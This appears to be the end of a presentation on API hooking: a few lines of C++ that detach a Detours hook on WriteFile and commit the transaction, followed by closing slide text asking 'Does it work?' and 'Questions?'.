DetourDetach(&(PVOID&)Real_Write_File, Detour_WriteFile);
DetourTransactionCommit();
}
return TRUE;
}Does it work? Video INC
The other one
Questions?
Thank You!
